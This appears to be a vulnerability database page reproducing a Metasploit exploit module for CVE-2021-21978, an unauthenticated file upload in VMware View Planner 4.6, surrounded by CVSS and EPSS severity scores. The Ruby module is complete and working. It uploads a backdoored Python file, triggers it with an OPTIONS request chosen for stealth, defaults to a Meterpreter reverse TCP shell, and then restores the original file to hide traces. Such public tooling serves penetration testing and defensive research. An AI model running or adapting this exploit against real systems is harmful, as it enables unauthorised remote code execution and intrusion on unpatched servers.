9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
This Metasploit module exploits an unauthenticated log file upload within the log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 Security Patch 1. Successful exploitation will result in remote code execution as the apache user inside the appacheServer Docker container.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',
'Description' => %q{
This module exploits an unauthenticated log file upload within the
log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6
Security Patch 1.
Successful exploitation will result in RCE as the apache user inside
the appacheServer Docker container.
},
'Author' => [
'Mikhail Klyuchnikov', # Discovery
'wvu', # Analysis and PoC
'Grant Willcox' # Metasploit Module
],
'References' => [
['CVE', '2021-21978'],
['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'],
['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC
],
'DisclosureDate' => '2021-03-02', # Vendor advisory
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'python',
'Targets' => [
[
'VMware View Planner 4.6.0',
{
'Arch' => ARCH_PYTHON,
'Type' => :linux_command,
'DefaultOptions' => {
'PAYLOAD' => 'python/meterpreter/reverse_tcp'
}
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')
)
unless res
return CheckCode::Unknown('Target did not respond to check.')
end
unless res.code == 200 && !res.body.empty?
return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')
end
@original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.
if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
return CheckCode::Safe("Target's log_upload_wsgi.py file has been patched.")
end
CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')
end
# We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.
# As the code for both is the same, minus the content of the file, this is a generic function to handle that.
def upload_file(content)
mime = Rex::MIME::Message.new
mime.add_part(content, 'application/octet-stream', nil, "form-data; name=\"logfile\"; filename=\"#{Rex::Text.rand_text_alpha(20)}\"")
mime.add_part('{"itrLogPath":"/etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py"}', nil, nil, 'form-data; name="logMetaData"')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'logupload'),
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
unless res.to_s.include?('File uploaded successfully.')
fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded successfully!")
end
end
def exploit
# Here we want to grab our template file, taken from a clean install but
# with a backdoor section added to it, and then fill in the PAYLOAD placeholder
# with the payload we want to execute.
data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))
payload.encoded.gsub!(/"/, '\\"')
file_content['PAYLOAD'] = payload.encoded
# Now that things are primed, upload the file to the target.
print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
upload_file(file_content)
print_good('Backdoor uploaded!')
# Use the OPTIONS request to trigger the backdoor. Technically this
# could be any other method including invalid ones like BACKDOOR, but for
# the purposes of stealth lets use a legitimate one.
print_status('Sending request to execute the backdoor!')
send_request_cgi(
'method' => 'OPTIONS',
'uri' => normalize_uri(target_uri.path, 'logupload')
)
ensure
# At this point we should have our shell after waiting a few seconds,
# so lets now restore the original file so we don't leave anything behind.
print_status('Reuploading the original code to remove the backdoor!')
upload_file(@original_content)
print_good('Original file restored, enjoy the shell!')
end
end
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%